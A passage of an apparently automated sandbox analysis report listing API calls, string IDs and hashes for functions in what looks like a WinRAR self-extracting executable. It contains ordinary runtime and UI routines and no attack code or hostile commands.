                                                                          • Instruction Fuzzy Hash: F34109B1908345AFC710DF65C8849ABBBF9FF88314F00892EF596C2650E738E659DB51
                                                                          APIs
                                                                          • _swprintf.LIBCMT ref: 00F02536
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                          • String ID: ;%u$x%u$xc%u
                                                                          • API String ID: 3053425827-2277559157
                                                                          • Opcode ID: 9b60b61b8c2d370150cec7c326c11710dfd962f5668d63d1bd01a596f32987e1
                                                                          • Instruction ID: 69d29318a784b915324e331282061c3b9a55081812c7d568c6d8309dc3ce5c26
                                                                          • Opcode Fuzzy Hash: 9b60b61b8c2d370150cec7c326c11710dfd962f5668d63d1bd01a596f32987e1
                                                                          • Instruction Fuzzy Hash: BFF13B71A043809BDB25DB24C899BFE77D56F90300F08456DED869B2C3CB689945F7B2
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID: </p>$</style>$<br>$<style>$>
                                                                          • API String ID: 176396367-3568243669
                                                                          • Opcode ID: d90fcfefe1d54c38fcc0a48e105d90a831a482599a28792864f05a65c16f0114
                                                                          • Instruction ID: 3d0e99beeb35166d6227c8fc5e776455bb8ddbed5836649509428b0280a59358
                                                                          • Opcode Fuzzy Hash: d90fcfefe1d54c38fcc0a48e105d90a831a482599a28792864f05a65c16f0114
                                                                          • Instruction Fuzzy Hash: 5851C866E4832295DB349A15EC317F673E1DFA1770F59041AE9C18B1C0FAE58DC1A3E1
                                                                          APIs
                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00F2FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 00F2F6CF
                                                                          • __fassign.LIBCMT ref: 00F2F74A
                                                                          • __fassign.LIBCMT ref: 00F2F765
                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00F2F78B
                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00F2FE02,00000000,?,?,?,?,?,?,?,?,?,00F2FE02,00000000), ref: 00F2F7AA
                                                                          • WriteFile.KERNEL32(?,00000000,00000001,00F2FE02,00000000,?,?,?,?,?,?,?,?,?,00F2FE02,00000000), ref: 00F2F7E3
                                                                          Similarity
                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1324828854-0
                                                                          • Opcode ID: f04942e16327f3aaa6c4e470613eae96a9b55961b090a73e34a66487f59a7b6a
                                                                          • Instruction ID: dfa69d541a43e1ed4253dc79a32aa6695ebdaa9143b25cd0c2fc3ccb14dcc2de
                                                                          • Opcode Fuzzy Hash: f04942e16327f3aaa6c4e470613eae96a9b55961b090a73e34a66487f59a7b6a
                                                                          • Instruction Fuzzy Hash: FE51B4B1D102599FDB10CFA8EC85AEEFBF8EF08310F14416AE551E7251E670AA44DBA0
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00F22937
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00F2293F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00F229C8
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00F229F3
                                                                          • _ValidateLocalCookies.LIBCMT ref: 00F22A48
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: c2fc488f466d5a205c4e0c3ad8d7c37b299b58a6155de05973d40a3b40b6e0c2
                                                                          • Instruction ID: 61b888e12e1754df65ee1817e15a99cf423dc80acde63b1eb8443870bb61c0e7
                                                                          • Opcode Fuzzy Hash: c2fc488f466d5a205c4e0c3ad8d7c37b299b58a6155de05973d40a3b40b6e0c2
                                                                          • Instruction Fuzzy Hash: 9F41B234E00228AFCF10DF68D881A9EBBB5EF45334F148065E815AB392D739DA45EF91
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000000), ref: 00F19EEE
                                                                          • GetWindowRect.USER32(?,00000000), ref: 00F19F44
                                                                          • ShowWindow.USER32(?,00000005,00000000), ref: 00F19FDB
                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00F19FE3
                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00F19FF9
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: Window$Show$RectText
                                                                          • String ID: RarHtmlClassName
                                                                          • API String ID: 3937224194-1658105358
                                                                          • Opcode ID: a2dd0a7596b7f54dcf80da9e2fac6bdf30c9c8482291f3c9c391c0f2d3f41f58
                                                                          • Instruction ID: 54d73c2cc16e5ee629acd07e08a1b8bd8bad9372c704e221945301d06728bec5
                                                                          • Opcode Fuzzy Hash: a2dd0a7596b7f54dcf80da9e2fac6bdf30c9c8482291f3c9c391c0f2d3f41f58
                                                                          • Instruction Fuzzy Hash: 7A41F332808314FFCB215F64DC48BAB7BA8FF49721F004558F85999056CBB4DA59EBA1
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: _wcslen
                                                                          • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                          • API String ID: 176396367-3743748572
                                                                          • Opcode ID: b31feefa30e948110d92bc803fa29e70478f649a47971c14d0be0100ca7e8a0d
                                                                          • Instruction ID: 2a2faed55bf35c2cd5212e9c5cfe88ed0bde4d1d2574c0fc0f219aa8bec5fa25
                                                                          • Opcode Fuzzy Hash: b31feefa30e948110d92bc803fa29e70478f649a47971c14d0be0100ca7e8a0d
                                                                          • Instruction Fuzzy Hash: 23315072A4834555DA30AF546C52BF673A4EF50730F60441EF48287280FADDBEC8A3E1
                                                                          APIs
                                                                            • Part of subcall function 00F2C868: _free.LIBCMT ref: 00F2C891
                                                                          • _free.LIBCMT ref: 00F2C8F2
                                                                            • Part of subcall function 00F28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?), ref: 00F28DE2
                                                                            • Part of subcall function 00F28DCC: GetLastError.KERNEL32(?,?,00F2C896,?,00000000,?,00000000,?,00F2C8BD,?,00000007,?,?,00F2CCBA,?,?), ref: 00F28DF4
                                                                          • _free.LIBCMT ref: 00F2C8FD
                                                                          • _free.LIBCMT ref: 00F2C908
                                                                          • _free.LIBCMT ref: 00F2C95C
                                                                          • _free.LIBCMT ref: 00F2C967
                                                                          • _free.LIBCMT ref: 00F2C972
                                                                          • _free.LIBCMT ref: 00F2C97D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                          • Instruction ID: 89bfa1250ec5b3d219efe196ed0e0bd403535e244598ea3ba0be1a003045a69a
                                                                          • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                          • Instruction Fuzzy Hash: CB113671582724B6E520B771EC07FCF7BAC9F04B00F504C15B2DD660A2DA7DB50AAB90
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00F1E669,00F1E5CC,00F1E86D), ref: 00F1E605
                                                                          • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F1E61B
                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F1E630
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                          • API String ID: 667068680-1718035505
                                                                          • Opcode ID: fecffa35e1df753ddabeded7646e7d07f064a4857fb809871b1c6dd35f4a0ca0
                                                                          • Instruction ID: 64aa11676b4a44fa23cee3b72a3a3c7cc8d16c0a3cce0254bf46af9a685783d3
                                                                          • Opcode Fuzzy Hash: fecffa35e1df753ddabeded7646e7d07f064a4857fb809871b1c6dd35f4a0ca0
                                                                          • Instruction Fuzzy Hash: 6FF0F672FA0226DB8F218F649C84AEA32C96E657B93480539DD05D3110EB50CCD0BF91
                                                                          APIs
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F114C2
                                                                            • Part of subcall function 00F0B146: GetVersionExW.KERNEL32(?), ref: 00F0B16B
                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F114E6
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F11500
                                                                          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F11513
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11523
                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F11533
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Time$File$System$Local$SpecificVersion
                                                                          • String ID:
                                                                          • API String ID: 2092733347-0
                                                                          • Opcode ID: 3d270bfddb83c544162fc7c6deca2b54a2f8945b00eb949ddb9690125ffe8c77
                                                                          • Instruction ID: 5526b3d732c289f3a95eee9f1b44d8c05c4b1bb530d945174cec41e373674438
                                                                          • Opcode Fuzzy Hash: 3d270bfddb83c544162fc7c6deca2b54a2f8945b00eb949ddb9690125ffe8c77
                                                                          • Instruction Fuzzy Hash: C631E87950834AABC704DFA8C88499BB7F9BF98714F044A1EF995C3210E734D549CBA6
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,00F22AF1,00F202FC,00F1FA34), ref: 00F22B08
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F22B16
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F22B2F
                                                                          • SetLastError.KERNEL32(00000000,00F22AF1,00F202FC,00F1FA34), ref: 00F22B81
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: a6c1f1140eac1b68793808f6e99f21507ebeddf2d8f3e7138b83c9d12d0a02a5
                                                                          • Instruction ID: 4d58cb9e274f27432f18f4d8c56ded86d645ac2b2790f239ff88b9d603289f9e
                                                                          • Opcode Fuzzy Hash: a6c1f1140eac1b68793808f6e99f21507ebeddf2d8f3e7138b83c9d12d0a02a5
                                                                          • Instruction Fuzzy Hash: 4101F7735093397EA6542B747C85A273B5AEF917747A0073AF120550F0EF194D00B154
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00F41030,00F24674,00F41030,?,?,00F23F73,00000050,?,00F41030,00000200), ref: 00F297E9
                                                                          • _free.LIBCMT ref: 00F2981C
                                                                          • _free.LIBCMT ref: 00F29844
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F29851
                                                                          • SetLastError.KERNEL32(00000000,?,00F41030,00000200), ref: 00F2985D
                                                                          • _abort.LIBCMT ref: 00F29863
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free$_abort
                                                                          • String ID:
                                                                          • API String ID: 3160817290-0
                                                                          • Opcode ID: 5ea2efe900e9febb0dfeb00dc0134b3a164ea318d49572fac91d637e788ea66a
                                                                          • Instruction ID: 4bafadb22aca131d1edba9a77c5bf8708e90d450e6247c6625d6649f86b6d099
                                                                          • Opcode Fuzzy Hash: 5ea2efe900e9febb0dfeb00dc0134b3a164ea318d49572fac91d637e788ea66a
                                                                          • Instruction Fuzzy Hash: C9F02836508A3167C7123334BC0AB9B3A669FD2770F690028F624931D2EEB8C807B125
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1DC47
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1DC61
                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1DC72
                                                                          • TranslateMessage.USER32(?), ref: 00F1DC7C
                                                                          • DispatchMessageW.USER32(?), ref: 00F1DC86
                                                                          • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F1DC91
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                          • String ID:
                                                                          • API String ID: 2148572870-0
                                                                          • Opcode ID: 012edc43fd1c4827ae1ed6f927953491ae4d694d6a7842ddec65610c595f638b
                                                                          • Instruction ID: c7649d0788a674d0e38982dbc161d4cf0580cf5646f154e78ae618a862572d31
                                                                          • Opcode Fuzzy Hash: 012edc43fd1c4827ae1ed6f927953491ae4d694d6a7842ddec65610c595f638b
                                                                          • Instruction Fuzzy Hash: CCF03C72E0121DBBCB20ABA5DC4CDCB7F7DEF427A5B004511F51AD2050D675868ADBE0
                                                                          APIs
                                                                            • Part of subcall function 00F105DA: _wcslen.LIBCMT ref: 00F105E0
                                                                            • Part of subcall function 00F0B92D: _wcsrchr.LIBVCRUNTIME ref: 00F0B944
                                                                          • _wcslen.LIBCMT ref: 00F0C197
                                                                          • _wcslen.LIBCMT ref: 00F0C1DF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcsrchr
                                                                          • String ID: .exe$.rar$.sfx
                                                                          • API String ID: 3513545583-31770016
                                                                          • Opcode ID: 53289117c9c12b1a25aeb631fb2f7f269b01fd42705bd569ac062d7342860b28
                                                                          • Instruction ID: f0f146fb5fd18631099502d82255be8f4347076712bca64e583baaf01d7789b1
                                                                          • Opcode Fuzzy Hash: 53289117c9c12b1a25aeb631fb2f7f269b01fd42705bd569ac062d7342860b28
                                                                          • Instruction Fuzzy Hash: 74411622A44311E5C731AF748C42A7AB3A8EF41764F144A0EF9C1AB5C1EBA48DC2F3D5
                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000800,?), ref: 00F1CE9D
                                                                            • Part of subcall function 00F0B690: _wcslen.LIBCMT ref: 00F0B696
                                                                          • _swprintf.LIBCMT ref: 00F1CED1
                                                                            • Part of subcall function 00F04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F040A5
                                                                          • SetDlgItemTextW.USER32(?,00000066,00F4946A), ref: 00F1CEF1
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1CFFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                          • String ID: %s%s%u
                                                                          • API String ID: 110358324-1360425832
                                                                          • Opcode ID: b1fd92c4d5119cc2befc8094aeb34e05fb26b5f733467c4ee6fb52ec0fb01439
                                                                          • Instruction ID: 091fba1408319c869f7d7ad490677fbc0cd38b96fb027933c00da46aed0da8af
                                                                          • Opcode Fuzzy Hash: b1fd92c4d5119cc2befc8094aeb34e05fb26b5f733467c4ee6fb52ec0fb01439
                                                                          • Instruction Fuzzy Hash: 0941B571940618AADF20DB90CC41FEE77BCEB05310F4080A6F909E7191EEB58A85EFB1
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 00F0BB27
                                                                          • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00F0A275,?,?,00000800,?,00F0A23A,?,00F0755C), ref: 00F0BBC5
                                                                          • _wcslen.LIBCMT ref: 00F0BC3B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$CurrentDirectory
                                                                          • String ID: UNC$\\?\
                                                                          • API String ID: 3341907918-253988292
                                                                          • Opcode ID: d0ed9337fd440ab831d850e355b5c6b774513f124ee43a262e7e5a3f078f7ede
                                                                          • Instruction ID: 57027c8370e4d2061c840ee8a75fc9084500853a3b3d463b53a9ad98c64a6fd7
                                                                          • Opcode Fuzzy Hash: d0ed9337fd440ab831d850e355b5c6b774513f124ee43a262e7e5a3f078f7ede
                                                                          • Instruction Fuzzy Hash: 6341A471840216A6EF21AF60CC41EEE77A9AF453A0F148465F855A3291DFB8DED0FB60
                                                                          APIs
                                                                          • LoadBitmapW.USER32(00000065), ref: 00F1B6ED
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1B712
                                                                          • DeleteObject.GDI32(00000000), ref: 00F1B744
                                                                          • DeleteObject.GDI32(00000000), ref: 00F1B767
                                                                            • Part of subcall function 00F1A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6D5
                                                                            • Part of subcall function 00F1A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A6EC
                                                                            • Part of subcall function 00F1A6C2: LoadResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A703
                                                                            • Part of subcall function 00F1A6C2: LockResource.KERNEL32(00000000,?,?,?,00F1B73D,00000066), ref: 00F1A712
                                                                            • Part of subcall function 00F1A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00F1B73D,00000066), ref: 00F1A72D
                                                                            • Part of subcall function 00F1A6C2: GlobalLock.KERNEL32(00000000), ref: 00F1A73E
                                                                            • Part of subcall function 00F1A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F1A762
                                                                            • Part of subcall function 00F1A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F1A7A7
                                                                            • Part of subcall function 00F1A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00F1A7C6
                                                                            • Part of subcall function 00F1A6C2: GlobalFree.KERNEL32(00000000), ref: 00F1A7CD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                          • String ID: ]
                                                                          • API String ID: 1797374341-3352871620
                                                                          • Opcode ID: 643a34a9f24909e9d7a4465d762a5308c991e6897b98bd7cb4ee836f3a3499aa
                                                                          • Instruction ID: 9ccf34bd7c03d373e485630b20128c3ff6cdd7c0948ef0ac7b8e00d68a903fe8
                                                                          • Opcode Fuzzy Hash: 643a34a9f24909e9d7a4465d762a5308c991e6897b98bd7cb4ee836f3a3499aa
                                                                          • Instruction Fuzzy Hash: 55012236900205B7C71277748D09AFF7ABAAFC0B62F080010FD10A72D1DF768D8972A1
                                                                          APIs
                                                                            • Part of subcall function 00F01316: GetDlgItem.USER32(00000000,00003021), ref: 00F0135A
                                                                            • Part of subcall function 00F01316: SetWindowTextW.USER32(00000000,00F335F4), ref: 00F01370
                                                                          • EndDialog.USER32(?,00000001), ref: 00F1D64B
                                                                          • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00F1D661
                                                                          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00F1D675
                                                                          • SetDlgItemTextW.USER32(?,00000068), ref: 00F1D684
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1682136102.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                                                          • Associated: 00000000.00000002.1682118824.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682164168.0000000000F33000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F3E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F45000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682182072.0000000000F62000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1682230876.0000000000F63000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_f00000_ZZ2sTsJFrt.jbxd
                                                                          Similarity
                                                                          • API ID: ItemText$DialogWindow
                                                                          • String ID: RENAMEDLG
                                                                          • API String ID: 445417207-3299779563
                                                                          • Opcode ID: 049900e1c0448d6a71faf2dd972e77a46d948fb3aacc3b00fffe50b9f4b5ca0e
                                                                          • Instruction ID: 4d3c7b3a295eb28f195cfc3f792e0f91e936868b7fcd188d956c5df84ae411b5
                                                                          • Opcode Fuzzy Hash: 049900e1c0448d6a71faf2dd972e77a46d948fb3aacc3b00fffe50b9f4b5ca0e
